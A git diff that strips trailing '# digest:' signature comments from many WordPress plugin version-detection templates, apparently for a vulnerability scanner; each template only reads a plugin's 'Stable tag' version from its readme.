a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 91d420fdd6..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022020b1d0980bcd28031c102b2c8d375e959a22ee6abdfed62319609e52ce7855dc022100b674f9f58578c07dccef80d7337df3c014a6d5c87e1f62ddb386dbcec533b4a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index bcdcbedc8d..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203caf34a35bf74363927225219bdd9e1c79b73c43f4ac2d46f964080292a1d74d02200ad5c97aa78dc738f48cd8ca5387513c891af68e5085b201866c53d2a64aaf44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index fc098bddae..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f7deeb27b1d25fb72dbf4f01e52e5cb014bc5367be5372ef46bb7c49e648f917022100be0cc7ae89ad32a4290bd01b6dd979b067f2a8faf78613958c6020c284a6822b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 0daa8a7a7f..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200c705232b4bfdd550440225505840db591c6ff780a82934c0c5b5a6d6dcf4ccb022100f0bf408d6b0923ff151dc7a067091d2d9232c613b20193f6ddccb1f706356d93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 57b77335f4..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100819a6f811eeab21f068524ea2195997d66fbdf69c5193b5ca2144b4ae3bd45e702200a2fda8d7787a6b7fa4b2f55e3618a3bd141ade76eff378981eff5578e044aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index c099d98108..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100da1e037655bec19ae1a4b096e6fd4daf93ed9be868d53b023dfcae3643139a6a022100d2b0e1af7fc376a4cfb4f76732eba552775c687d778e30d01bbc24d0d0cf7034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 95ec044118..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c77f47743325657fa7ccd5faad358dd6c149beae01ab02e4232a8e851ec162f022041b2bb3a0a131e0dd890acd291ef7b4ccc9d5f787c2b2dd8bbc812cfce2889ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index c9279818ff..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb60649eb1446defc73566275b5566b924d09ffce3c93d480432d7fc32aa4279022070d11c64cc6d17178cdff7e4074f07ec37a8badbb21fc7fb009566ed32543f14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 092cedcf52..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009f6aa50f74f61524ecafb90d883659319860d37b7ad4503ffe80171a2318e5890221009c2ce35af9d4dd139d6ccc859c64489a553e2b254764ede9b10e4d7515800e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 76b81eccc2..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ce10b680ef8c27c17dc49354e6c523d1165bc3cfe378489e9af9269db5772240220071a91b23bb32711a14e86c3f40f6da6dc03ee224ba18035c3bb09324cf4aec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 504ea64c3f..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cfc0ba0c196b9059260d954d2d8aac676e5565d2b11873a40f56130be059f0af022100c7af3e5f930c5a0f5651cffe6441670d84cd07d61c7114dd699de43f14ff3691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 63937d1643..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a5fb7ddae9922ff5c7ddaf17a7a803539798149f74c0a169ec1cdc25126ed81502203ed54f00c643cc0e22dfef63704cee0d0bc7c1442a7d167de5422650a7be385c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index d8fcf47145..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022056dd655927f2ae242ed85d50cb768bcb37572c2f4398de22c4fc320d54611b1c022100cd8bc1eac71bfa503e6d667c36c4a612a8778ddcb1cb39a824fbc1d5cb9c7a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6698dcb164..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220506fe0d83ab4d7f29b0272bf0d81f960858fae49341999cf21ddba327524659e022046b78ded8af13bc5f99e9471e8ec9e6a2b7e5e823bc78de351e6814d16c65520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 9253b4354d..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c989b52766e69a3b5addbdbe637d8f35766b44e4618660effaa2682b4c6ae42f022100c70c9a533b8f43f1ac055ab2d4e765b91c3a8774d2331e015ea8fd2967fd4ef5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 886054370d..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e4d6efcc1ca3cd823ce762e37eeb8719245f2c154d1d3d6c64d1062693eb500022100acf1aa9e6deb6de2fbe9c22a353dbea8b38721f7206e60fb9b2e81fc7650f937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 19562fd436..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d8cd61de709603fe8b86ade9d04627ec71042dace1b197050ce94102ded76c20022069e62ba9930b731d225fdad83796edc3154764db95d250808071ef552663538c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index dfa2b1c235..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206e676d11477ad3d25979a83425a2ce4aa13ce06507f0a9b9cc74213e30674cfd022100ebe4eafc304d4d24ade9fe4e4132ec1d532595f818cc8627d099bf04df890781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index aa80293a56..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207fdc1fb11002a9f91b18c6aeb224dcd970c1a8fa89e1e90bfd49147fda19861a022100ea7a07a3aae6c30488322dd20aa686c99c6aa8ec83afd9924792b4875620facb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 7147aca658..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100973b11625e2bc14595bd04a394b9419e7e385efa143cddcec381cf3afcf9b534022100834b5a8fc20576c4cbba95940b76b4f6f2f9cddcee8d6843f114a4ef0d5fd08f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index f20c9c3457..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b6f50984a157674c0fd4eec934fd93137fe0b5cfd5f65309180ce04c41df983022100d2dcaab9302472d48945c7f3add3200e33e5736cc8188ad54a01a9c2676ce21d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index fa13e200dd..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100992b7e25b2336f92e2026a843a9d8e120db82bccae5bed4870a2a96ee63a71ee022100c6670430ad50724dd8ed7156d9679ca4b4c9ba0c0896d319226d648e814c4826:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 455db156cb..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f512b80424eed162dc566ef082c41a4fd8e16d16c4f81277ab53678127187e80220269c1d42df6de24d1d4f756a622f51e16631862514c4837eaafb4e261265d154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index c29932ff34..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022052fc18c16f7115bcecc08afe766b0972d1843b709250a061621d3a2f73a98afb022100ea51f657d915039aa06f1691bef28c11ff21ec68742653b22550039a6727b516:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 478c9fda54..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e8510e4c66b5880bcd44bcc933151c5c27df5ee0d58ef0ba87ad5bd17cbbb3f022100f2a269829e0d323933e2f456fd70ef44a9fed32f8759500ad2a7853ce601d2fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 7c1ce57e14..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210081b85b730924a1e1dd4889f4f7e0fce225e62db5eb4f66d5cc051e971f2952e9022100867bd39ecb4e088f707c6e908523d058fcc86b4cfde088cd362942508a2b1ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 83c05cbd56..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206c0aaef205c241a8f074070a80e9b7dced442c0d3660757cae802f3d80083358022100d948b153a9396a6caafcc3569ef7319d20b83423fe4051b1bd5012222cf96b47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index ff1a6610a3..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207360e93a25d1d783d80b8f9fe73a64ab06fc9c033e006d32b39fc6e8bb7d83eb02202ff6f93a6e8a4f1643bbe219107f099f484812f2a02d1b18f99a72303b9bed0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index c93c6080a8..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd9fb122bec77cf740006579ba190f7296fd264105d985a88b9ad4218e693866022026786fb5af12951c7008e62f726cee6f4f168eaad2332277678617ce23b4417c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index b8d9b40638..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100adad1ad9ebbe661168184425f3696959b02744763d27169b9b96082b2f088771022009894556ff46db85c622a6f732b64178a43acdc9355413d16b95ccc0340c908e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 5c7006dc73..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008b50e59fcdf8896ef31fc0cafb1ed8c72fc45fe8b13db3ce6790f3ba4685dba40220193f18c01d37c27ae42a8e20044d38bf847054fdfa7c2f747bec23020e4d7583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b28001258e..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200510a864dbba368e1681236c37dba501df114b1d2cc8d0d33578210e9cb782c1022100b9bd450b7788dabf6e042c7626caa1a112d3bdbc8663331c6a6b438ee95a870c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 55cad5869c..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026c747c424572c46a2ebb0f153add1d05763bf1aa2809cc0ec974e597f05f9f6022004b5208baa14d4b22f0f9b49e5d3d2026fd6f61833aef9ee13f036cb80a4a46f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 2d61768cea..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100819695e50edda2717a5f7cab57d1a278fb17ea39ad6fc7fed28898e4570d5c09022038c9c7be7f2840334f7902f9ebb7dc91bf398e68c71184b7cd00c95af1456695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 0585435fe3..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220596f4b454cbc4b6dc907cbcfdff002e00141e63b1e0f2ad96a24256ea10a2144022100f81b3be9a60db8a3b57b90631c77f4ff70a88fd1cfaac23e0820d2a772258bc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index cfd9ee30bb..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201f3487992c216a7b0cb457b7455c3d911f04b7c4fda93036e9a84504ee4684cc022034ef11297d35dbec5876238848ebf4c05ecaac2a620f807bfdf2e1e31661a11b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 6b50a16f96..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e8c6cc354f159732b312affe3064207bf6c58da067ab6293cf1a5b11d0035dc5022005528275c6a3187a0672d69266b8ebb37b606b5368f77cde61069c01d091c355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 3291fbd904..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203a30e98852ac8538c8114f2655e1cf14f420d96654c26b71022a76f814a7773202202c9bfc95d4c759309c54d776b7e0d1b119016dc5b538edfe95b9b1251dc46f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index fce4b0f954..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100beaa880ad470a375772bf259fd7db9761c4c2a18eaf77518dc680b57dad39a89022100fe62543ada78448b61d9d3e20f78dd833d9369a2fa3589df37ec850647fd8592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index fb671b8292..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220416feca3071abf7eed5c53a63fd81b2fac7ed33ef4167cdf60b541a4b50a06ef022054d967cfc64c050623c80949c17553070381e46b74115e897e5a73cfc6430333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 2ceea681d9..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204059e54e4c07b28f69fcd55d8b7e8e8f8df92d559a2ce636a3b4abd8b18a8e2e022100e9e483c7fb9a76b550447786961c087350d77020f30f0eadf163ded6ee633110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 141d41b645..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201e66eda72d24fa37dd39400b57aee35f97025d891d7aeb2995f1c4f48262c9bb022100cc681420c2ce540b3fd3779bfeeffad78804acec275149bc43f253465b42933e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 7d82fe4819..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd72276c60ef5f42a8bc5a75df2b7d049dab99659b9a4e286fde570fbb8641c3022100b5733be0f3304216b7d6b8371dafb14d6607fd78e7b1aac49e95ad4dbc51eb8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 4504482088..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a329fc774a2fd6eeb46533dffc1bbc0d332a905133d927feb68fe93ee8b60c66022100d09ce60481d8889ae8187fd571dc23bac5249e772a399c26fc8b5e367259ec04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 0d08b02a66..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a1ae406c484d267aff7524bb846c90609caa7268b7e65e5a7f5f2b9160a7e93602202118c29f8c4d87df1c8e9db4a35c168f1a0c20843fc7dee22200c8d38caab7b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index d235401c32..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c5070d6cb6e7a46552e043202d62dc0079a662eb551d9bd085b250365878cacc02201dd4779db1ef2847fa4b77b0adab0fa95fe5af13857a857a7250b1633bbc967d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 48a03a8c27..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 